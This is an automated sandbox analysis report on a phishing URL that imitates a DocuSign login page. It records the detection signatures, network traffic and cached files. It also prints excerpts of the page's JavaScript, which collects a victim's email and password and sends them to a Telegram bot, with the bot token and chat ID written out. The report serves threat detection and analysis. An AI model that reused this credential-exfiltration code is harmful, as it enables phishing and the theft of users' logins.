Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html

Overview

General Information

Sample URL:http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html
Analysis ID:1591500
Infos:

Detection

HTMLPhisher
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Misleading page title found
Yara detected HtmlPhish10
Yara detected HtmlPhish64
AI detected suspicious Javascript
Javascript uses Clearbit API to dynamically determine company logos
Javascript uses Telegram API
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Submit button contains javascript call

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 2924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2020,i,1219990260256689793,5521421119150629212,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_49JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

    HTML

    SourceRuleDescriptionAuthorStrings
    1.0.pages.csvJoeSecurity_HtmlPhish_64Yara detected HtmlPhish_64Joe Security
      1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmlAvira URL Cloud: detection malicious, Label: malware

        Phishing

        barindex
        AI detected phishing page
        Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmlJoe Sandbox AI: Score: 9 Reasons: The brand 'DocuSign' is a well-known electronic signature service., The legitimate domain for DocuSign is 'docusign.com'., The provided URL 'pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev' does not match the legitimate domain., The URL uses a subdomain structure that is not associated with DocuSign., The domain 'r2.dev' is not related to DocuSign and could be a generic hosting or cloud service., Presence of a password input field on a non-legitimate domain is suspicious. DOM: 1.0.pages.csv
        Misleading page title found
        Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmlPage Title: DocuSign Login - Enter your password to sign in
        Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmlPage Title: DocuSign Login - Enter your password to sign in
        Yara detected HtmlPhish10
        Source: Yara matchFile source: 1.0.pages.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_49, type: DROPPED
        Yara detected HtmlPhish64
        Source: Yara matchFile source: 1.0.pages.csv, type: HTML
        AI detected suspicious Javascript
        Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.de... This script demonstrates high-risk behaviors, including data exfiltration and dynamic code execution. It collects user credentials (email and password) and sends them to a Telegram bot, which is a suspicious and potentially malicious activity. The script also manipulates the DOM aggressively, hiding and showing different elements. Overall, the script exhibits clear signs of malicious intent and should be considered a high-risk security threat.
        Javascript uses Clearbit API to dynamically determine company logos
        Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmlHTTP Parser: function z() { var email = window.location.hash.substr(1); //change window.location.hash.substr(1) to "xxxemail" if you are using attachment.// example // var email = "xxxemail";var ind=email.indexof("@"); var my_slice=email.substr((ind+1));var my_slice2=email.substr(ind+1,email.length);document.getelementbyid('username').value = email;document.getelementbyid('logoname').innerhtml = email;/*$('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);*/}
        Javascript uses Telegram API
        Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmlHTTP Parser: function sendemail() {var filter = /^([a-za-z0-9_\.\-])+\@(([a-za-z0-9\-])+\.)+([a-za-z0-9]{2,4})+$/;if (!filter.test(document.getelementbyid('username').value)) {alert('invalid email'); return false; } if (document.getelementbyid('password').value === '') { alert('please enter a valid password!'); return false; }var x = document.getelementbyid("div4"); var a = document.getelementbyid("div1"); var b = document.getelementbyid("div2"); a.style.display = "none"; b.style.display = "block"; x.style.display = "none"; var username = document.getelementbyid('username').value;var password = document.getelementbyid('password').value;var ozi = "\n=========docusignboy======\n" ozi+="email :"+username ozi+="\npass :" +password ozi+="\n============================\n" tmsend(ozi)}function tmsend(message){ var token = "7638787397:aahdnjvzecz4khxa5j6sxi8dfak8uvijtfo"; var chat_id= "6247174206"; c...
        Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmlHTTP Parser: Number of links: 0
        Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
        Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmlHTTP Parser: Title: DocuSign Login - Enter your password to sign in does not match URL
        Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmlHTTP Parser: On click: sendEmail()
        Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmlHTTP Parser: <input type="password" .../> found
        Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmlHTTP Parser: No <meta name="author".. found
        Source: https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmlHTTP Parser: No <meta name="copyright".. found
        Source: global trafficTCP traffic: 192.168.2.4:54343 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.4:54322 -> 1.1.1.1:53
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /docu/e_protocol.html HTTP/1.1Host: pub-3b43df3d08c6428eb75adaf661b4216f.r2.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1Host: www.continentalsports.co.ukConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1Host: www.continentalsports.co.ukConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /docu/e_protocol.html HTTP/1.1Host: pub-3b43df3d08c6428eb75adaf661b4216f.r2.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev
        Source: global trafficDNS traffic detected: DNS query: www.continentalsports.co.uk
        Source: chromecache_49.2.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
        Source: chromecache_49.2.drString found in binary or memory: https://api.telegram.org/bot$
        Source: chromecache_49.2.drString found in binary or memory: https://logo.clearbit.com/
        Source: chromecache_49.2.drString found in binary or memory: https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 54398 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54335
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54398
        Source: unknownNetwork traffic detected: HTTP traffic on port 54330 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 54335 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54327
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54330
        Source: unknownNetwork traffic detected: HTTP traffic on port 54327 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: classification engineClassification label: mal92.phis.win@17/10@10/6
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2020,i,1219990260256689793,5521421119150629212,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2020,i,1219990260256689793,5521421119150629212,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting        		Valid AccountsWindows Management Instrumentation1
        Browser Extensions        		1
        Process Injection        		1
        Process Injection        		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Scripting        		Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
        Non-Application Layer Protocol        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
        Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
        Ingress Tool Transfer        		Traffic DuplicationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html100%Avira URL Cloudmalware

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l0%Avira URL Cloudsafe
        https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev
        		172.66.0.235
        		truetrue
          		unknown
          www.google.com
          		142.250.181.228
          		truefalse
            		high
            www.continentalsports.co.uk
            		95.154.228.177
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmltrue
                		unknown
                http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.htmltrue
                  		unknown
                  https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpgfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://api.telegram.org/bot$chromecache_49.2.drfalse
                    		high
                    https://logo.clearbit.com/chromecache_49.2.drfalse
                      		high
                      https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/lchromecache_49.2.drfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      95.154.228.177
                      		www.continentalsports.co.ukUnited Kingdom
                      		20860IOMART-ASGBfalse
                      239.255.255.250
                      		unknownReserved
                      		unknownunknownfalse
                      142.250.181.228
                      		www.google.comUnited States
                      		15169GOOGLEUSfalse
                      172.66.0.235
                      		pub-3b43df3d08c6428eb75adaf661b4216f.r2.devUnited States
                      		13335CLOUDFLARENETUStrue

                      Private

                      IP
                      192.168.2.4
                      192.168.2.5

                      General Information

                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1591500
                      Start date and time:2025-01-15 01:41:02 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 0s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:browseurl.jbs
                      Sample URL:http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal92.phis.win@17/10@10/6
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 142.250.185.67, 142.250.185.238, 142.251.168.84, 142.250.184.206, 142.250.186.46, 142.250.80.46, 74.125.0.102, 142.250.185.202, 142.250.184.234, 142.250.185.106, 216.58.206.42, 142.250.186.106, 142.250.185.170, 172.217.18.10, 142.250.184.202, 142.250.186.138, 142.250.186.42, 142.250.181.234, 142.250.185.234, 172.217.16.202, 142.250.186.74, 216.58.212.138, 142.250.186.170, 199.232.210.172, 2.23.77.188, 142.250.185.163, 2.23.242.162, 20.109.210.53, 13.107.246.45
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ajax.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, r1.sn-t0aekn7e.gvt1.com, clients.l.google.com, r1---sn-t0aekn7e.gvt1.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: http://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      No context

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      Chrome Cache Entry: 46

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with no line terminators
                      Category:downloaded
                      Size (bytes):16
                      Entropy (8bit):3.875
                      Encrypted:false
                      SSDEEP:3:HwT:QT
                      MD5:344EB8D19F5C0A3435EF32FD9601F1FB
                      SHA1:E082EB1D89D91CC1A25A1D510268E576109DA07E
                      SHA-256:B44289B54959639FCA6A742F7CC2E2A5AF9C6E7B73C1B3E25227CA9790F3A587
                      SHA-512:EB9F1CD4A566192160371F4B182EE00180F6912333FFB79C537BD80635A6AFE6379FBE7BB74043D635BA65C9F4F956D9E97E516E24E516F2591192A36F866EAE
                      Malicious:false
                      Reputation:low
                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmvkNS96nASHBIFDc5BTHo=?alt=proto
                      Preview:CgkKBw3OQUx6GgA=

                      Chrome Cache Entry: 47

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80", progressive, precision 8, 265x265, components 3
                      Category:downloaded
                      Size (bytes):7494
                      Entropy (8bit):7.868668842804636
                      Encrypted:false
                      SSDEEP:192:ygdh+IXyP70WVRYaDpmW05te0t5WaEtyWU:yqh870CJDpU5wpU
                      MD5:E27D91CCCC9D333CE4E99262E368053D
                      SHA1:F59234771F6CD9D102FD50527CE1D684E305EDDD
                      SHA-256:17A7F5E4C9165EF60EB0CBA29D6DC36F32F7FAB0306A6CDC898997141228C5FA
                      SHA-512:069239A90A49B2848BAD2FE451C6E947E280BA4C93BF8E53C61D00765A532F636F1F733F6427E75ACCF76B432E55A0D5E1BECE8912C3C39F3E4915D2421A9E1F
                      Malicious:false
                      Reputation:low
                      URL:https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg
                      Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((...........".............................................................................D..U={.l=...J.z%....*..1..K.....y..X...C`..l)....}...]9.z:J..W......T..s...^n.QCu.[f.U..Z..mk...}...s3.......H........O?..7...-..3...k......8xv29..fL..i....{w....5..l.....g.;.=..j..n-98WKo".q........f,..v.....4].i...[:*y...l[X.-eLo...S..9/`.F7.kf............,E;fy2.nQ..\K....^1<.|....7.<..k......D....>H...u.2....,......Tg...C..7.<..|~.x@...&.^{.y.;4..l....c.N....wg.Y....s..m.D..."`..z.4j.6+f6.M.k.f.2..r...j.K.T/.4.|. .....>[....4.4..V..LY.W...h...B.7q...i..OX. .....<..j.W"...9.u.|.(..e....o.J.k.r.E..c ...L....k=.+U..@%.#,j.....7iU..v..7........"`..Q.9T....q.N.Zr.h.X.B.+UI.^.X......^I"2..9FFI...l..f..H..6a. .....!".!".!".!".."$......*.

                      Chrome Cache Entry: 48

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (32065)
                      Category:dropped
                      Size (bytes):85578
                      Entropy (8bit):5.366055229017455
                      Encrypted:false
                      SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                      MD5:2F6B11A7E914718E0290410E85366FE9
                      SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                      SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                      SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                      Malicious:false
                      Reputation:low
                      Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

                      Chrome Cache Entry: 49

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with very long lines (65350)
                      Category:downloaded
                      Size (bytes):252205
                      Entropy (8bit):6.083975621579217
                      Encrypted:false
                      SSDEEP:6144:8ajpSYt72uB8zd3nuatHiuZ1aYxs7TA7V+se6LOt1Xf54:8a1SYtRc33CMaoQTA7V+se61
                      MD5:AC9DBD4FD1FB0ADD29A1B8703BCE9406
                      SHA1:D71E70C8AC03CF68134D5AB68DD2F05AD4B23002
                      SHA-256:6316CB80E53A87A277A3CF231119AC5BE5E8DEF905800F583841D36358EDB374
                      SHA-512:FFDFE6A01976EB9CDF1E289CA03F938952058151440C62925CCC8D1BCFA8E48EEF7A72581461FC35B10AE02853116A27AE5C70D30AF166B10FEF6C3C9F53E5CF
                      Malicious:false
                      Reputation:low
                      URL:https://pub-3b43df3d08c6428eb75adaf661b4216f.r2.dev/docu/e_protocol.html
                      Preview:<!DOCTYPE html> <html lang=en class=account-server>.<meta charset=utf-8>.<meta name=viewport content="initial-scale=1.0">.<title>DocuSign Login - Enter your password to sign in</title>..<style data-emotion=css data-single-filez-stylesheet=16>.account-server{height:100%}.site-content,#root{height:inherit}.account-server .site-content{background-color:#fff}.hide-accessible{position:absolute;width:0px;height:0px;left:-10000px}.ink-authentication{display:flex;flex-direction:column;min-height:100%}.ink-footer{flex-shrink:0}.ink-header{position:sticky;top:0;height:64px}.ink-body{background-color:#f7f6f7;overflow-y:auto;flex:1 0 auto}.ink-auth-main{padding:4rem 0;background-color:#fff;border:1px solid rgba(25,24,35,.1490196078);border-radius:.25rem}@media (max-width:1039px){.ink-body{background-color:#fff}.ink-auth-main{border:unset;border-radius:unset;padding:1.5rem 2rem}}@media (min-width:600px){.ink-body{display:flex;flex-direction:column;align-items:center}}@media (min-width:600px) and (m

                      Chrome Cache Entry: 50

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80", progressive, precision 8, 265x265, components 3
                      Category:dropped
                      Size (bytes):7494
                      Entropy (8bit):7.868668842804636
                      Encrypted:false
                      SSDEEP:192:ygdh+IXyP70WVRYaDpmW05te0t5WaEtyWU:yqh870CJDpU5wpU
                      MD5:E27D91CCCC9D333CE4E99262E368053D
                      SHA1:F59234771F6CD9D102FD50527CE1D684E305EDDD
                      SHA-256:17A7F5E4C9165EF60EB0CBA29D6DC36F32F7FAB0306A6CDC898997141228C5FA
                      SHA-512:069239A90A49B2848BAD2FE451C6E947E280BA4C93BF8E53C61D00765A532F636F1F733F6427E75ACCF76B432E55A0D5E1BECE8912C3C39F3E4915D2421A9E1F
                      Malicious:false
                      Reputation:low
